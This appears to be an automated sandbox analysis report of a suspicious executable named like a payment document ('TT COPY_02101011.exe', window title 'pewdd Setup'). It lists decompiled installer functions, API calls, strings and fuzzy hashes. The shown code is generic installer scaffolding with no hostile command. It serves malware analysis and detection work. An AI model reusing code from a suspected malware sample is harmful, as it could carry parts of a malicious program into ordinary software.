Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405889();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402825
0x00402825
0x00402880
0x0040288c

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 0040373D, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040373D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004058A2(__ecx, "1033");
				while(1) {
					_t26 =  *0x42eba4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42eb70; // 0x571350
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E00405889(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "pewdd Setup", 0xfffffffe));
						_t11 =  *0x42eb8c; // 0x2
						_t27 =  *0x42eb88; // 0x5714fc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x571514
								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403741
0x00403746
0x0040374c
0x00403751
0x00403751
0x00403759
0x00000000
0x00000000
0x0040375b
0x00403761
0x00403769
0x0040376b
0x00403771
0x00403771
0x00403773
0x0040377f
0x00000000
0x00000000
0x00403783
0x00000000
0x00000000
0x00000000
0x00403785
0x0040378a
0x00403793
0x00403799
0x0040379e
0x004037b2
0x004037bd
0x004037d5
0x004037db
0x004037e0
0x004037e8
0x00403809
0x00403809
0x00403809
0x004037ea
0x004037ec
0x004037ec
0x004037f0
0x004037f3
0x004037f7
0x004037f7
0x004037fc
0x00403802
0x00403802
0x00000000
0x004037ec
0x004037a0
0x004037a5
0x004037ae
0x004037a7
0x004037a7
0x004037a7
0x004037a5

APIs

SetWindowTextA.USER32(00000000,pewdd Setup), ref: 004037D5

Strings

pewdd Setup, xrefs: 004037C4
C:\Users\user\AppData\Local\Temp\, xrefs: 0040373E
1033, xrefs: 00403741, 0040374B, 004037BC

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\$pewdd Setup
API String ID: 530164218-3395851509
Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB93, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__woutput_l.LIBCMT ref: 1000DBEC

Part of subcall function 1000ECAB: __getptd_noexit.LIBCMT ref: 1000ECAB

Strings

B, xrefs: 1000DBDD

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd_noexit__woutput_l
String ID: B
API String ID: 3669879410-1255198513
Opcode ID: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
Instruction ID: 364e4ebba8070adea721101281f6a2cfad84ec0809f21dc11fd63d115f74d872
Opcode Fuzzy Hash: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
Instruction Fuzzy Hash: 4A11517190421D9EAF00EFA4DC819EE77B8FF08354F10412BE814A6185EA355905CB75

Uniqueness

Uniqueness Score: -1.00%

Function 10002AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 10002AB5
HeapAlloc.KERNEL32(00000000), ref: 10002ABC

Strings

returning %p, xrefs: 10002B1E

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: returning %p
API String ID: 1617791916-1981732286
Opcode ID: 18d273de328fa26a1ca35548bb89007e5bb946fe18a21b53f1fc2e5f3bf999df
Instruction ID: 19f7ab8b2faa8bf384bb5050bba3a5ca35940cf43705d348629620c12c1df635
Opcode Fuzzy Hash: 18d273de328fa26a1ca35548bb89007e5bb946fe18a21b53f1fc2e5f3bf999df
Instruction Fuzzy Hash: 111109B8A00208EFE701CF94C945B99B7F0EB49355F208198E9095B356D77ADE80DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040518B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040518B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405194
0x004051b0
0x004051b8
0x004051bd
0x00000000
0x004051c3
0x004051c7

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
CloseHandle.KERNEL32(?), ref: 004051BD

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
Error launching installer, xrefs: 0040519E

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1785902839
Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9

Uniqueness

Uniqueness Score: -1.00%

Function 10002B40, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryregistryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 10002B5B
GetProcessHeap.KERNEL32(00000000,?), ref: 10002B67
HeapFree.KERNEL32(00000000), ref: 10002B6E

Strings

destroying %p, xrefs: 10002B47

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CloseFreeProcess
String ID: destroying %p
API String ID: 1203615452-3738993722
Opcode ID: a9117b934fdd6baba2089d809751436a3f0a9d21eb35b021bf9818c1e2a4741f
Instruction ID: 3ede338f41f121cd3867df338115b91863fcfafaa1bef59c7fa54537ab628b1b
Opcode Fuzzy Hash: a9117b934fdd6baba2089d809751436a3f0a9d21eb35b021bf9818c1e2a4741f
Instruction Fuzzy Hash: F2E04CB9510218AFE701DFA4DC89EEA3BACEB4D755F448004FA0D8B251D675E9818BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0040541E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040541E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x0040541f
0x00405436
0x0040543e
0x0040543e
0x00405446

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
lstrcatA.KERNEL32(?,0040900C), ref: 0040543E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE

Uniqueness

Uniqueness Score: -1.00%

Function 10010980, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100109B6
__isleadbyte_l.LIBCMT ref: 100109E4
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010A12
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010A48

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a326ccb4c208bbd1b9aa08ea66356f62ea223fb5d1eaf7516e4ce7748e9165e0
Instruction ID: 380745b120e2b0fca2f12d2c353f88ae8ead66a6f5b6c000cf70b8cda04ad6f7
Opcode Fuzzy Hash: a326ccb4c208bbd1b9aa08ea66356f62ea223fb5d1eaf7516e4ce7748e9165e0
Instruction Fuzzy Hash: AE319C3170024AEFEB11CE60CC45BAA7BF9FF41290F164129F8959B191E7B1E8D0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x00402880
0x0040288c

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004054B2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054B2(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405264
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405449(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x004054bb
0x004054bb
0x004054c2
0x004054c5
0x004054ca
0x004054dd
0x004054f7
0x00000000
0x004054f7
0x004054e1
0x004054e2
0x004054e5
0x004054e6
0x004054ee
0x00000000
0x00000000
0x004054f0
0x004054f3
0x00000000
0x00000000
0x00000000
0x004054f3
0x00000000
0x004054d3
0x00000000
0x004054d4

APIs

CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004054C0
CharNextA.USER32(00000000), ref: 004054C5
CharNextA.USER32(00000000), ref: 004054D4

Strings

dR@, xrefs: 004054BB, 004054BF

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: dR@
API String ID: 3213498283-1322173608
Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af8c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af93 = 1;
				 *0x40af90 = _t11 & 0x00000001;
				 *0x40af91 = _t11 & 0x00000002;
				 *0x40af92 = _t11 & 0x00000004;
				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af7c);
				_push(_t14);
				_push(_t26);
				E00405889();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F

Uniqueness

Uniqueness Score: -1.00%

Function 100154FE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

__fltout2.LIBCMT ref: 1001552B

Part of subcall function 1001677F: ___dtold.LIBCMT ref: 100167A3
Part of subcall function 1001677F: _$I10_OUTPUT.LIBCMT ref: 100167BE

Part of subcall function 1000ECAB: __getptd_noexit.LIBCMT ref: 1000ECAB

__fptostr.LIBCMT ref: 10015593

Strings

-, xrefs: 10015580

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: I10____dtold__fltout2__fptostr__getptd_noexit
String ID: -
API String ID: 2971678636-2547889144
Opcode ID: d2959434b4653bb3086d598e208e7bc33a13d8b391fecff10b1ccb2c29e8e395
Instruction ID: c9c910acf0cea897d6e0f6e61f9ea18633ec71ab2fd0a5864193f4efefa41320
Opcode Fuzzy Hash: d2959434b4653bb3086d598e208e7bc33a13d8b391fecff10b1ccb2c29e8e395
Instruction Fuzzy Hash: 11212D77A00109DBDB15DF79CC559EF7B6ADF08260F054139F815AF140EA71E94087A1

Uniqueness

Uniqueness Score: -1.00%

Function 10002980, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 100029DF

Strings

(%p) %s %p %p, xrefs: 100029AE
(%p) Unhandled Sink: %s, xrefs: 10002A1C

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
